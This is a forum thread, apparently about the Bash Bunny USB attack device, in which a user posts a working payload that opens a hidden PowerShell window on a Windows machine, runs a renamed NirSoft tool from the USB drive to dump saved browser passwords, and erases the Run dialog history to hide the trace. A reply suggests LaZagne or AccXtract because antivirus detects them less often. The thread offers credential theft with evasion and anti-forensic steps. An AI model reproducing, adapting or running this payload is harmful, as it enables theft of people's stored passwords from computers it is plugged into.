fastest WebBrowser pass stealaer

[washplant26]

Author Justin Hynes credit: Darren Kitchen and www.nirsoft.net

This allows you to get passwords from browers within seconds! This is my very first payload and I have tested it on the new bash bunny and so far it works without a problem There is few thing you need though in order to have this payload working 1 you need the name your bash bunny uf so that the passwords get saved to the correct place. 2. http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip 3 You need to put the s.exe(very important that you keep it that name) in the home directory of the bash bunny The payload must be in switch 1 or switch 2 but the s.exe software must be put in the home directory

Well that is it. Thanks Darren Kitchen and Shannon Morese for all of the youtube videos. :) very helpful.

LED R 100
	ATTACKMODE HID STORAGE
	QUACK DELAY 1000
	QUACK GUI r
	QUACK DELAY 75
	QUACK STRING "powershell -windowstyle hidden "'$D'" =Get-WMIObject Win32_Volume | ? { "'$_.Label'" -eq 'uf' } | select name;cd "'$D.name'";./s /stext p;Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
	QUACK ENTER
	LED G

[RazerBlade]

Just so you know, the nirsoft tools get detected almost right away when trying to execute the program. Maybe look into Accxtract https://github.com/garrett-davidson/AccXtract or LaZagne https://github.com/AlessandroZ/LaZagne which in my experience doesn't get detected so often

[washplant26]

Thanks I will look into that. Any other suggestions is highly appreciated. :)